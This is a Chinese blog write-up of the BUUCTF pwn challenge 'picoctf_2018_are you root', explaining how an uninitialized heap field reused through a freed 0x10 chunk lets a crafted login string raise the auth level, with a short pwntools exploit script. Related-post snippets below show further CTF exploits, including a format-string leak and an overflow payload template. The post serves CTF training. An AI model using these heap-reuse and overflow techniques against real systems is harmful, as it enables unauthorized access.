[BUUCTF-pwn]——picoctf_2018_are you root

最新推荐文章于 2021-11-20 14:32:13 发布
原创 最新推荐文章于 2021-11-20 14:32:13 发布 · 407 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。

[BUUCTF-pwn]——picoctf_2018_are you root

害,有点小烧脑子这道题. 又学习了几个没见过的C语言函数

peak小知识

  • strtok: 第一次使用时候,需要两个参数从第一个参数开始,到第二个参数接断并且返回.
  • strdup: malloc一个参数字符串大小的内存,并且将字符串拷贝进去.

正文

下面进入正文,首先checksec看下
在这里插入图片描述
再去IDA中看下, 好明显的暗示
在这里插入图片描述
紧接着去看看代码, 想要进入give-flag函数, 需要v6 不为0, 同时 *(v6 + 2) == 5
在这里插入图片描述
我们可以看到s和v10的距离是6, login加上一个空格的距离也是6
在这里插入图片描述
所以, v6就是我们后面输入的字符串以及会申请同样大小的内存空间
在这里插入图片描述
我们注意到, *v6会free掉, 如果我们申请的大小为0x10那么放在fastbin里面后,下次我们申请的话,仍然是该空间.
在这里插入图片描述

思路

利用login, 将我们想要的数据排列好, *(v6 + 2), 其实就是v6[2], 四个字节的每个数据
所以字符只需要是’aaaaaaaa’ + p32(0x5) + ‘aaaa’, 因为p32是4个字节刚好, 当然我们也可以是’aaaaaaaa’ + p64(0x5), 因为是小序端存储, 所以四个字节读取的时候也是5
注意大小应该是0x10, 这样最好,可以百分百申请回来
将其释放掉
重新申请回来这样就不是 * v6指向它了而是v6指向它了

exploit

from pwn import *
 
#p = process('./PicoCTF_2018_are_you_root')
p = remote('node3.buuoj.cn',27037)
 

p.sendlineafter('>','login ' + 'a'*0x8 + p32(0x5) + 'aaaa')
 
p.sendlineafter('>','reset')

p.sendlineafter('>','login aa') #这个aa可以随便输入,只要有并且不溢出就好

p.sendlineafter('>','get-flag')
p.interactive()
[BUUCTF]PWN——picoctf_2018_are you root(程序逻辑错误)
mcmuyanga的博客
03-17 606
picoctf_2018_are you root 例行检查,64位程序,开启了canary和nx 本地试运行一下,看看大概的情况
PicoCTF_2018_are_you_root(未初始化验证漏洞)
seaaseesa的博客
04-17 959
PicoCTF_2018_are_you_root 首先,检查一下程序的保护机制 然后,我们用IDA分析一下,只要符合条件就可以显示flag,但是按照正常的逻辑是不能的。 Login时,会malloc一个堆,大小为0x10,并且偏移8处就是auth的验证码。但是login时,并没有初始化*(v7+8)处的值,使得它的值是前面的操作影响。而strdup函数,内部会malloc一个与字符...
picoctf_2018_are you root
m0_51251108的博客
11-04 260
picoctf_2018_are you root: 参考博客: ha1vk 程序功能到达level5能打出flag,正常运行的话不会让你到达level5 login功能: strdup()在内部调用了malloc()为变量分配内存 返回一个指针,指向为复制字符串分配的空间 可以看到是申请了两个chunk,且我们的level参数就存在后面 直接说解法: 就是输name的我们填满8个a,然后就可以改到level参数 strdup会把name copy下去,包括level参数,我们free它的话,释放到tc
BUUCTF(pwn)picoctf_2018_are you root
半岛铁盒的博客
04-11 239
strdup: malloc一个参数字符串大小的内存,并且将字符串拷贝进去. 思路 利用login, 将我们想要的数据排列好, *(v6 + 2), 其实就是v6[2], 每四个字节就是一个数据 所以字符只需要是 ’aaaaaaaa’ + p64(0x5), 注意大小应该是0x10, 这样最好,可以百分百申请回来 将其释放掉 重新申请回来这样就不是 * v6指向它了而是v6指向它了 from pwn import * p = remote('node3.buuoj.cn',27037) p...
[buuctf]picoctf_2018_are you root未初始化漏洞
weixin_46521144的博客
04-02 375
挺神奇的这道题,本地就是打不通,远程可以打通,绝了到底是为什么??? 本来以为这道题有一个指针置0的操作就没有UAF了,看来是我还见得太少,把UAF理解错了(其实我也没开始学堆哈哈哈哈) 参考了网上师傅的解答,发现这里是一个未初始化漏洞。我画个栈帧大家就明白了 先写一下函数长什么样 栈帧长这样 注意到一开始v6是一个二级指针,也就是指向数组的数组 strtok分配的内容是存在*v6里面的,所以上述栈帧应该是对的 那么在用完free之后呢,这里的指针归零是指:不能再用该指针寻
picoctf_2018_echooo
doudoudedi
09-23 593
发现是简单的32位格式化字符串但是并且flag存了栈上,直接泄漏就行了,但是内存是小端存储的,所以倒序输出即可 exp: from pwn import * #p=process('./PicoCTF_2018_echooo') p=remote('node3.buuoj.cn',26798) offset=11 flag='' for i in range(27,27+11): payload='%{}$p'.format(str(i)) p.sendlineafter('> ',p
BUUCTF-PWN刷题记录-6
weixin_44145820的博客
04-14 977
目录picoctf_2018_are you rootciscn_2019_final_2 picoctf_2018_are you root 例行安全检查 菜单如下: 我们需要auth_level等于5才能get flag user结构体如下 struct USER{ char *name; long long auth_level; } 漏洞原理分析: 在login中分配了两次内存...
攻防世界PWN之shell题解
seaaseesa的博客
11-22 1675
shell 首先,检查一下程序的保护机制 然后,我们用IDA分析 存在栈溢出漏洞 我们先运行程序,发现可以直接输命令 然而,其他命令都不可用,需要登录成功才能用 我们看看登录的逻辑 程序从creds.txt文件中一行一行的读取,取第一个冒号后面的内容为用户名,取第二个冒号后面的内容为密码 只要我们输入的用户名和密码存在于那个文件,就登录成功,然后就能执行shel...
CTF解题思路: 数据包相关题目
梦想专栏
08-14 3058
一、 背景 在CTF赛中,有时候会接触到数据包相关的题目,这篇文章目的就是了解相关题目的解决思路。本文会长期更新下去。 二、实战 实战(1): 直接从数据包中找 flag、FLAG、unicode类字符串 实战(2): 需要绕个圈子的题目(base64编码题目) 比如说: 给了一个数据包,让你找flag,在实战(1)方法无效的情况下,该如何寻找 一般情况下,都会埋一个flag在数...
shell [XCTF-PWN][高手进阶区]CTF writeup攻防世界题解系列25
重新启程
12-27 919
题目地址:shell 这个题目是高手进阶区的第14题,这一题我没有按照顺序来,耍脾气来!呵呵 看看保护机制 [*] '/ctf/work/python/shell/shell' Arch: amd64-64-little RELRO: No RELRO Stack: Canary found NX: NX enabled ...
[BUUCTF-pwn]——warmup_csaw_2016
Y_peak的博客
01-30 6002
BUUCTF——warmup_csaw_2016 题目地址:https://buuoj.cn/challenges 题目: 管他三七二十一,先将文件下载下来再说。老规矩,现在Linux上用checksec看看文件。64位,Stack、NX、PIE都没有开,应该是栈溢出的题。 赶快 go go go 去window 上用IDA反汇编看看,看到返回的是gets函数,一个典型的可以利用栈溢出覆盖的地方。其他没什么有用的信息。 按Shift + F12,看一下字符串。不看不知道一看有惊喜。cat flag.
[BUUCTF-pwn]——ciscn_2019_n_3
Y_peak的博客
11-20 3298
[BUUCTF-pwn]——ciscn_2019_n_3 结构体: //该结构体仅仅是选择字符串的时候的结构体 struct chunk { void *rec_str_print(); void *rec_str_free(); char *str; } //该结构体仅仅是选择数字的时候的结构体 struct chunk { void *rec_int_print(); void *rec_int_free(); int number; } 这道题目就是简单的u
[BUUCTF-pwn]——ciscn_2019_n_8
Y_peak的博客
02-10 3084
[BUUCTF-pwn]——ciscn_2019_n_8 题目地址:https://buuoj.cn/challenges#ciscn_2019_n_8 题目 上去checksec一下,吓一跳保护基本全开了。 在IDA中一看,开心了。如此简单 只需要v[13] ==17 就好。因为var是以字符串的形式输入的。所以exploit如下: exploit from pwn import * p = remote("node3.buuoj.cn",29772) p.sendline("aaaa"*13 +
[BUUCTF-pwn]——jarvisoj_level0
Y_peak的博客
01-31 2774
[BUUCTF-pwn]——jarvisoj_level0 题目地址:https://buuoj.cn/challenges#jarvisoj_level0 题目: 还是先下载下来在Linux上checksex一下,基本确实又是栈溢出了。 64位,所以我们用64位的IDA打开,没什么有用的信息,点开vulnerable_function函数 发现栈溢出的read函数,前面为0意味着标准读入,后面的长度也可以。没毛病就是这个地方了。 再翻翻其他函数,发现了我们想要的system函数。找到位置,和需要覆
[BUUCTF-pwn]——ciscn_2019_es_2(内涵peak小知识)
Y_peak的博客
02-16 1994
[BUUCTF-pwn]——ciscn_2019_es_2 题目地址: https://buuoj.cn/challenges#ciscn_2019_es_2 这是一道栈劫持的题,第一次写这种题的题解写的详细一点。 栈劫持 or 栈迁移 栈劫持也可以称为栈迁移,用来解决栈本身可以利用的空间不够用,一般是溢出空间不够用,没办法有效构造rop链。这个时候我们可以通过劫持ebp的方式,利用leave 和 ret两个汇编指令来做到栈劫持(栈迁移)。 leave 等价于 mov ebp, esp; pop
[BUUCTF-pwn]——others_shellcode
Y_peak的博客
02-12 1995
[BUUCTF-pwn]——others_shellcode 题目地址: https://buuoj.cn/challenges#others_shellcode peak 小知识 写这道题之前, 大家首先要了解, 想要获得一个shell, 除了system("/bin/sh") 以外, 还有一种更好的方法, 就是系统调用中的 execve("/bin/sh", NULL, NULL)获得shell。我们可以在 Linxu系统调用号表 中找到对应的系统调用号,进行调用, 其中系统调用号用 eax 储存
buuctf-pwn入门
最新发布
01-26
### BUUCTF PWN 类题目入门教程 #### 学习资源推荐 对于希望进入PWN挑战领域的新手来说,选择合适的教材和平台至关重要。王爽老师的《汇编语言》提供了基础理论支持,有助于理解底层操作原理[^1]。此外,《IDA Pro权威指南》能够帮助掌握逆向工程工具的使用技巧,这对解决PWN问题非常有帮助[^1]。 #### 实践平台建议 为了更好地练习技能并应用所学知识,在线实践环境不可或缺。BuuOJ是一个专门为CTF爱好者设计的学习与交流社区,其中包含了大量针对不同难度级别的PWN题目供玩家尝试解答[^2]。通过不断做题积累经验,可以逐步提高自己的技术水平。 #### 解决方案流程概述 当面对具体的PWN题目时,通常遵循以下几个步骤来构建解决方案: - **检测保护机制**:利用`checksec`命令查看目标程序启用了哪些安全防护措施; - **静态分析**:借助IDA Pro等反汇编器对二进制文件进行深入剖析,找出潜在漏洞点; - **编写Exploit脚本**:基于发现的安全缺陷精心构造攻击载荷; - **测试验证**:最后一步是在本地环境中反复调试直至成功获取Flag。 ```bash # 使用 checksec 工具检查可执行文件的安全特性 $ checksec ./vuln_program ``` ```python from pwn import * # 连接到远程服务器上的服务端口 conn = remote('example.com', 9999) # 发送恶意输入数据给存在缓冲区溢出漏洞的服务进程 payload = b'A' * offset + pack(address) conn.sendline(payload) # 接收返回的数据包以确认是否获得shell访问权限 response = conn.recv() print(response.decode()) ```
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值